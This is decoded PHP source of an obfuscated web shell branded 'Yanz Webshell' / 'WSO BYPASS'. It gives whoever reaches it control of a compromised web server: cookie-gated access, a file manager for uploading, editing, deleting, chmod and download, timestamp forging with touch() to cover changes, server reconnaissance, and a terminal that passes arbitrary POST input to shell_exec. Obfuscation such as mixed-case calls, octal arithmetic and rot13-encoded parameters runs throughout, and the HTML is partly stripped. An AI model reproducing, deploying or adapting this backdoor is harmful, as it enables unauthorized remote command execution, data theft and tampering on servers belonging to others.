/* Decoded by unphp.net */ None?>b'hsh = "fa704e7366d666bd"; $this->_i = "_" . sUbSTr(mD5($_SERVER["HTTP_HOST"]), -056 - -0152 - 074, 075 + 0146 + -0240); $this->_taj = "#df5"; $this->_hej = "Windows-1251"; if (!@isset($_COOKIE[$this->_i]) || $_COOKIE[$this->_i] != $this->hsh) { $this->SetcOoK($this->_i, $this->hsh); } } function sTArTUP() { if (FUNCTION_exiSTS("ini_get")) { $_vpb = @INI_geT("safe_mode"); $_cp = @INi_geT("disable_functions"); } if (!$_vpb && FUNCTion_ExiSts("error_reporting")) { ERRoR_rePoRTINg((int) round(0 + 0)); } if (!$_vpb && FUnCTIOn_ExIsTs("set_time_limit")) { seT_tIME_limit((int) round(0 + 0)); } if (fUNctIoN_eXiSTs("get_magic_quotes_gpc") && fuNCTIon_ExIStS("array_map") && fUNcTiOn_eXiSts("stripslashes") && funCTion_exIstS("is_array")) { if (@GeT_maGIC_quOtEs_gPC()) { function WSS($_a) { return @Is_arraY($_a) ? @ArRAY_MAp("WSS", $_a) : @STRIPslAshEs($_a); } $_POST = WSs($_POST); $_COOKIE = wss($_COOKIE); } } if (!FUnCtiON_EXIsts("posix_getpwuid") && StrPOS($_cp, "posix_getpwuid") === false) { function pOSiX_GeTpwUid($_l) { return false; } } if (!FUncTIoN_ExisTS("posix_getgrgid") && StRPos($_cp, "posix_getgrgid") === false) { function POsIx_GetgRgid($_l) { return false; } } if (StRtOlowER(suBSTr(PHP_OS, 01200 + -01200, (int) round(1.5 + 1.5))) == "win") { $_vor = "win"; } else { $_vor = "nix"; } $_wda = $_SERVER["DOCUMENT_ROOT"]; if (FUnctiOn_exIStS("getcwd")) { $_zrt = @GeTcwD(); } else { $_zrt = @DIRname(__FILE__); } if (isset($_POST["c"]) && $_POST["c"] != "") { $_POST["c"] = STR_ROt13($_POST["c"]); } if (isset($_POST["c"])) { if (FunCTion_EXisTs("chdir")) { @CHDir($_POST["c"]); } } if (FuNCtION_eXiSTS("getcwd")) { $_za = @GeTcwd(); } elseif (@isset($_POST["c"]) && $_POST["c"] != "") { $_za = $_POST["c"]; } else { $_za = $_zrt; } if ($_vor == "win") { $_zrt = Str_REPlAcE("\", "/", $_zrt); $_za = StR_rEplaCE("\", "/", $_za); } if ($_za[Strlen($_za) - (0577 - -0621 - 01417)] != "/") { $_za .= "/"; } $this->_cp = $_cp; $this->_za = $_za; $this->_zrt = $_zrt; $this->_wda = $_wda; $this->_vpb = $_vpb; $this->_vor = $_vor; } function ActloGOuT() { $_i = $this->_i; SETCOokIE($_i, "", TimE() - (int) round(1800 + 1800)); die("bye!"); } function aCtFm() { $_za = $this->_za; if (!empty($_POST["p"])) { $_ozl = @FiLEMTIme($_POST["c"]); switch ($_POST["p"]) { case "uploadFile": if (!@MoVE_UPLOADeD_FIle($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) { echo "Can\'t upload file!"; } elseif ($_ozl) { @tOUcH($_FILES["f"]["name"], $_ozl, $_ozl); } break; case "mkdir": if (!@mKDir(stR_roT13($_POST["x"]))) { echo "Can\'t create new dir"; } elseif ($_ozl) { @TOucH(StR_Rot13($_POST["x"]), $_ozl, $_ozl); } break; case "delete": function DELETedIR($_we) { $_we = suBStr($_we, -(int) round(0.5 + 0.5)) == "/" ? $_we : $_we . "/"; if ($_hcf = @oPEnDIR($_we)) { while (($_nos = @reaDDIr($_hcf)) !== false) { $_nos = $_we . $_nos; if (@bAseName($_nos) == ".." || @BASENAmE($_nos) == ".") { continue; } $_ei = @fIletYPe($_nos); if ($_ei == "dir") { DeLEtedIR($_nos); } else { @uNLink($_nos); } } @CLOsedir($_hcf); } @RMdir($_we); } if (@Is_ARrAY($_POST["f"])) { foreach ($_POST["f"] as $_rb) { if ($_rb == "..") { continue; } $_rb = STR_ROt13(URLdECodE($_rb)); if (@is_diR($_rb)) { dElETEdIr($_rb); } else { @uNlInk($_rb); } } } break; } if ($_ozl) { ToUcH($_POST["c"], $_ozl, $_ozl); } } echo "

File manager

"; $_wb = WsCanDir(@isset($_POST["c"]) ? $_POST["c"] : $_za); if ($_wb === false) { echo "Can\'t open this folder!"; return; } global $_rpl; $_rpl = array("name", -0263 + -034 - -0320); if (!empty($_POST["p"])) { if (@pReg_matCH("!s_([A-z]+)_(\d{1})!", $_POST["p"], $_tf)) { $_rpl = array($_tf[0402 + -0135 - 0244], (int) $_tf[0407 - 0405]); } } echo ""; $_q = $_vgl = array(); $_t = COUNt($_wb); for ($_o = (int) round(0 + 0 + 0); $_o < $_t; $_o++) { $_j = array("name" => $_wb[$_o], "path" => $_za . $_wb[$_o], "modify" => @DATE("Y-m-d H:i:s", @FIleMTimE($_za . $_wb[$_o])), "perms" => WpERMsCOlOR($_za . $_wb[$_o]), "size" => @FILesize($_za . $_wb[$_o])); if (@is_fIlE($_za . $_wb[$_o])) { $_vgl[] = @arRay_mERgE($_j, array("type" => "file")); } elseif (@IS_LiNK($_za . $_wb[$_o])) { $_q[] = @ARray_merGE($_j, array("type" => "link", "link" => ReADLInK($_j["path"]))); } elseif (@IS_DIR($_za . $_wb[$_o])) { $_q[] = @ARraY_mErGe($_j, array("type" => "dir")); } } function wcmP($_snp, $_jy) { global $_rpl; if ($_rpl[0215 - 0215] != "size") { return @StRcMP(STrToLOwer($_snp[$_rpl[-0236 - -0236]]), strtOlowEr($_jy[$_rpl[0155 + -0142 + -013]])) * ($_rpl[(int) round(0.5 + 0.5)] ? (int) round(0.33333333333333 + 0.33333333333333 + 0.33333333333333) : -(-0465 - -0466)); } else { return ($_snp["size"] < $_jy["size"] ? -(0601 - 0600) : (int) round(0.5 + 0.5)) * ($_rpl[(int) round(0.5 + 0.5)] ? 0312 + -0227 + -062 : -(017 - 016)); } } @UsORt($_vgl, "wCmp"); @Usort($_q, "wCmp"); $_vgl = @ArrAY_MERGE($_q, $_vgl); $_fl = 0545 - 0277 - 0246; foreach ($_vgl as $_rb) { $_fc = StR_rot13(urLeNcodE($_rb["name"])); echo ""; $_fl = $_fl ? -0742 + 0742 : -0753 - -0754; } echo "
NameSizeModifyPermissionsActions
" . htmLSpeciAlChARS($_rb["name"]) : "g(\'fm\',\'" . Str_RoT13($_rb["path"]) . "\');\" " . (empty($_rb["link"]) ? "" : "title=\'" . $_rb["link"] . "\'") . ">[ " . hTmLspecialchars($_rb["name"]) . " ]") . "" . ($_rb["type"] == "file" ? viEwsIze($_rb["size"]) : $_rb["type"]) . "" . $_rb["modify"] . "" . $_rb["perms"] . "Rename Touch" . ($_rb["type"] == "file" ? " Edit Download" : "") . "
 >\'>
"; } function ACtFt() { $_cp = $this->_cp; if (@isset($_POST["p"])) { $_POST["p"] = STr_ROt13(UrLDecOdE($_POST["p"])); } if (@isset($_POST["x"])) { switch ($_POST["x"]) { case "download": if (@Is_FIle($_POST["p"]) && @IS_READaBle($_POST["p"])) { OB_StART("ob_gzhandler", (int) round(2048 + 2048)); @heaDEr("Content-Disposition: attachment; filename=" . @BAsENAMe($_POST["p"])); if (FUnctIOn_EXiSTs("mime_content_type")) { $_ei = @MimE_ConTeNt_TypE($_POST["p"]); @heADEr("Content-Type: " . $_ei); } else { @HeAder("Content-Type: application/octet-stream"); } $_jj = @FOpEn($_POST["p"], "r"); if ($_jj) { while (!@FeOF($_jj)) { echo @FGeTs($_jj, 01013 - 0702 + 01667); } @FClose($_jj); } } exit; break; case "mkfile": if (!@FILE_exiStS($_POST["p"])) { $_x = @fIlEMTImE($_POST["c"]); $_jj = @fOpeN($_POST["p"], "w"); if ($_jj) { @fCLoSe($_jj); if ($_x) { @touCH($_POST["c"], $_x, $_x); @toUCh($_POST["p"], $_x, $_x); } $_POST["x"] = "edit"; } } break; } } echo "

File tools

"; if (!@fiLE_ExisTs($_POST["p"])) { echo "File not exists"; return; } $_bhr = @Posix_Getpwuid(@FiLeowNEr($_POST["p"])); if (!$_bhr) { $_bhr["name"] = @FiLEoWNER($_POST["p"]); $_hs["name"] = @fILEGrOUp($_POST["p"]); } else { $_hs = @PosIx_gEtGRgiD(@FILEGROUp($_POST["p"])); } echo "Name: " . htMLSpeciaLcHArs(@BaSenAMe($_POST["p"])) . " Size: " . (@iS_FILe($_POST["p"]) ? vIewSize(@fILESIze($_POST["p"])) : "-") . " Permission: " . WPeRMScOLoR($_POST["p"]) . " Owner/Group: " . $_bhr["name"] . "/" . $_hs["name"] . "
"; echo "Change time: " . @dATe("Y-m-d H:i:s", @fileCtIme($_POST["p"])) . " Access time: " . @DaTE("Y-m-d H:i:s", @FiLeaTime($_POST["p"])) . " Modify time: " . @daTe("Y-m-d H:i:s", @FilEmTime($_POST["p"])) . "

"; if (empty($_POST["x"])) { $_POST["x"] = "view"; } if (@IS_File($_POST["p"])) { $_fbd = array("View", "Download", "Edit", "Chmod", "Rename", "Touch"); } else { $_fbd = array("Chmod", "Rename", "Touch"); } foreach ($_fbd as $_e) { echo "" . (@strToLOweR($_e) == $_POST["x"] ? "[ " . $_e . " ]" : $_e) . " "; } echo "

"; switch ($_POST["x"]) { case "view": echo "
";
                $_jj = @foPEN($_POST["p"], "r");
                if ($_jj) {
                    while (!@fEof($_jj)) {
                        echo HtmlsPECiAlcHArs(@FGets($_jj, (int) round(341.33333333333 + 341.33333333333 + 341.33333333333)));
                    }
                    @fcloSe($_jj);
                }
                echo "
"; break; case "chmod": if (!empty($_POST["s"])) { $_jfl = -077 + -021 - -0120; for ($_o = STRlEn($_POST["s"]) - (int) round(0.5 + 0.5); $_o >= -0265 - 0637 - -01124; --$_o) { $_jfl += (int) $_POST["s"][$_o] * @pOw((int) round(2.6666666666667 + 2.6666666666667 + 2.6666666666667), StRLen($_POST["s"]) - $_o - (int) round(0.33333333333333 + 0.33333333333333 + 0.33333333333333)); } if (!@ChmOd($_POST["p"], $_jfl)) { echo "Can\'t set permissions!
"; } } @cLeaRStATCACHe(); echo "
>\">
"; break; case "edit": if (!@IS_wrItAble($_POST["p"])) { echo "File isn\'t writeable"; break; } if (!empty($_POST["s"])) { $_ozl = @FilEmtiMe($_POST["p"]); $_POST["s"] = suBStR($_POST["s"], (int) round(0.5 + 0.5)); $_POST["s"] = @base64_DeCOde($_POST["s"]); $_jj = @foPEN($_POST["p"], "w"); if ($_jj) { @fputs($_jj, $_POST["s"]); @FCLoSe($_jj); echo "Saved!
"; } } echo "
"; if ($_ozl) { @TOucH($_POST["p"], $_ozl, $_ozl); } @CLEarSTATCachE(); break; case "rename": $_x = @fiLEmtIME($_POST["c"]); if (!empty($_POST["s"])) { if (!@rEnaME($_POST["p"], STR_Rot13($_POST["s"]))) { echo "Can\'t rename!
"; } else { if ($_x) { @TOuCH($_POST["c"], $_x, $_x); } die(""); } } @CleaRSTatCacHe(); echo "
>\">
"; break; case "touch": if (!empty($_POST["s"])) { $_ozl = @StrToTiMe($_POST["s"]); if ($_ozl) { if (!@TouCH($_POST["p"], $_ozl, $_ozl)) { echo "Fail!"; } else { echo "Touched!"; } } else { echo "Bad time format!"; } } @cLEarStatcaCHe(); echo "
>\">
"; break; } echo "
"; } function wheADeR() { $_taj = $this->_taj; $_hej = $this->_hej; $_za = $this->_za; $_zrt = $this->_zrt; $_wda = $this->_wda; $_i = $this->_i; $_vpb = $this->_vpb; $_vor = $this->_vor; if (empty($_POST["ch"])) { $_POST["ch"] = $_hej; } echo "" . $_SERVER["HTTP_HOST"] . " - WSOX ENC
"; if (FUncTIon_exISTs("diskfreespace")) { $_pn = @dISkfREEspAce($_za); } if (FUnCTIOn_ExiSTs("disk_total_space")) { $_ejl = @dISk_toTAL_SPACE($_za); } $_ejl = $_ejl ? $_ejl : (int) round(0.5 + 0.5); if (fUncTiOn_eXISTs("php_uname")) { $_v = @php_UnAME(); } elseif (funCTIon_ExiSTs("phpinfo")) { Ob_STArt(); PHpiNfO(); $_no = ob_Get_CLEAn(); if (false !== preG_mAtch("!System\s*([^\<]+)!i", $_no, $_bf)) { $_v = tRIm($_bf[025 + 027 - 053]); } } $_bl = ""; $_we = @exPLOdE("/", $_za); $_t = cOuNt($_we); for ($_o = (int) round(0 + 0); $_o < $_t - (01041 - 01040); $_o++) { $_bl .= "" . $_we[$_o] . "/"; } $_cw = array("UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866"); $_n = ""; foreach ($_cw as $_nos) { $_n .= ""; } $_fbd = array("Files" => "fm"); if (!empty($_COOKIE[$_i])) { $_fbd["Logout"] = "Logout"; } $_h = ""; foreach ($_fbd as $_gtq => $_e) { $_h .= "[ " . $_gtq . " ]"; } $_dej = ""; if ($_vor == "win") { foreach (@Range("c", "z") as $_szx) { if (@Is_dIr($_szx . ":\")) { $_dej .= "[ " . $_szx . " ] "; } } } $_uy = $_SERVER["SERVER_ADDR"]; if (empty($_uy)) { $_uy = GeThoSTbyName($_SERVER["SERVER_NAME"]); } echo "" . "" . "
Attention:
Uname:
Php:
Hdd:
Cwd:" . ($_vor == "win" ? "
Drives:" : "") . "		Yanz Webshell! - PRIV8 WEB SHELL ORB YANZ BYPASS!
" . ($_v ? subsTr($_v, -01 + 01, (int) round(40 + 40 + 40)) : "N/A") . "
" . @pHPversiON() . " Safe mode: " . ($_vpb ? "ON" : "OFF") . " Datetime: " . daTE("Y-m-d H:i:s") . "
" . ($_ejl ? vIewSIZe($_ejl) : "") . " Free: " . ($_pn ? vIewSiZe($_pn) : "") . " (" . ($_pn && $_ejl ? (int) ($_pn / $_ejl * (0157 + 0136 - 0151)) : "0") . "%)
" . $_bl . " " . WPerMSCOLOr($_za) . " [ root ] [ home ] Text
" . $_dej . "
Server IP:
" . $_uy . "
Client IP:
" . $_SERVER["REMOTE_ADDR"] . "
" . "" . $_h . "
"; } function wfOotER() { $_za = $this->_za; $_lia = @is_WrItabLe($_za) ? " (Writeable)" : " (Not writable)"; echo "
Change dir:
>\'>
Read file:
>\'>
Make dir:" . $_lia . "
>\'>
Make file:" . $_lia . "
>\'>
Terminal:
>\' name=\'subcmd\'>
Upload file:" . $_lia . "
>\'>

"; } } function vIewSIze($_xwm, $_yj = null) { if (iS_INt($_xwm)) { $_xwm = @spRINtf("%u", $_xwm); } if ($_xwm >= (int) round(357913941.33333 + 357913941.33333 + 357913941.33333)) { return @spRINtf("%1.2f", $_xwm / (010000001240 + -01240)) . " GB"; } elseif ($_xwm >= 03777073 - 04000560 + 04001465) { return @SprinTF("%1.2f", $_xwm / (int) round(349525.33333333 + 349525.33333333 + 349525.33333333)) . " MB"; } elseif ($_xwm >= (int) round(512 + 512)) { return @sPRinTf("%1.2f", $_xwm / (int) round(341.33333333333 + 341.33333333333 + 341.33333333333)) . " KB"; } else { return $_xwm . " B"; } } function WPerMs($_l) { if (($_l & 0140371 - 0137733 + 0137342) == 0137615 - -0163) { $_o = "s"; } elseif (($_l & (int) round(20480 + 20480)) == 0117774 - -04) { $_o = "l"; } elseif (($_l & (int) round(10922.666666667 + 10922.666666667 + 10922.666666667)) == 0100270 + -0270) { $_o = "-"; } elseif (($_l & (int) round(8192 + 8192 + 8192)) == (int) round(12288 + 12288)) { $_o = "b"; } elseif (($_l & (int) round(8192 + 8192)) == 037655 - 040121 - -040244) { $_o = "d"; } elseif (($_l & (int) round(2730.6666666667 + 2730.6666666667 + 2730.6666666667)) == 017574 + 0204) { $_o = "c"; } elseif (($_l & (int) round(1365.3333333333 + 1365.3333333333 + 1365.3333333333)) == 010110 + -0110) { $_o = "p"; } else { $_o = "u"; } $_o .= $_l & 0752 + 044 - 0416 ? "r" : "-"; $_o .= $_l & (int) round(42.666666666667 + 42.666666666667 + 42.666666666667) ? "w" : "-"; $_o .= $_l & -01223 - -01323 ? $_l & (int) round(682.66666666667 + 682.66666666667 + 682.66666666667) ? "s" : "x" : ($_l & 05014 + 04725 + -05741 ? "S" : "-"); $_o .= $_l & -01044 - -01104 ? "r" : "-"; $_o .= $_l & 020 + 022 - 022 ? "w" : "-"; $_o .= $_l & (int) round(2.6666666666667 + 2.6666666666667 + 2.6666666666667) ? $_l & 01564 + 01365 + -01151 ? "s" : "x" : ($_l & (int) round(512 + 512) ? "S" : "-"); $_o .= $_l & (int) round(1.3333333333333 + 1.3333333333333 + 1.3333333333333) ? "r" : "-"; $_o .= $_l & (int) round(0.66666666666667 + 0.66666666666667 + 0.66666666666667) ? "w" : "-"; $_o .= $_l & 0106 - 0105 ? $_l & (int) round(170.66666666667 + 170.66666666667 + 170.66666666667) ? "t" : "x" : ($_l & 0765 + 0470 - 0455 ? "T" : "-"); return $_o; } function wpERmsCOlor($_rb) { if (!@is_rEAdaBLE($_rb)) { return "" . wPErms(fILEpERMs($_rb)) . ""; } elseif (!@iS_WRItabLE($_rb)) { return "" . wPERms(FIlEperMS($_rb)) . ""; } else { return "" . wpeRmS(FiLepERmS($_rb)) . ""; } } function wScanDIR($_pa, $_u = "uvxf") { if (funCTion_exISTs("scandir")) { return @ScAnDIr($_pa); } else { if ($_hcf = @oPENDIr($_pa)) { while (false !== ($_nm = @reAdDIR($_hcf))) { $_vgl[] = $_nm; } @ClOseDIr($_hcf); } return $_vgl; } } $_tcn = new _pps(); $_tcn->AFTErlOGin(); $_tcn->STaRtup(); if (@isset($_POST["a"])) { switch ($_POST["a"]) { case "fm": $_tcn->WheADer(); $_tcn->acTfm(); $_tcn->wfOoter(); break; case "ft": if (@isset($_POST["x"]) && $_POST["x"] == "download") { $_tcn->aCtFT(); } else { $_tcn->wHeADeR(); $_tcn->aCTFT(); $_tcn->wfoOteR(); } break; case "sr": $_tcn->WhEAdEr(); $_tcn->aCtSr(); $_tcn->wfOOTer(); break; case "Logout": $_tcn->actLoGoUT(); break; default: $_tcn->WHeaDer(); $_tcn->ActfM(); $_tcn->WFOOtEr(); break; } } elseif (!@isset($_POST["a"])) { $_tcn->WHeAdER(); $_tcn->AcTfm(); $_tcn->WfOOTER(); if (isset($_POST[\'subcmd\'])) { echo "
";
        $input = $_POST[\'command\'];
        $output = shell_exec($input);
        echo "






































































";
        echo "
WSO BYPASS YANZ!
";
        echo "
";
        echo \'$WSOYanZ: \';
        echo $output;
        echo "
"; exit; } }'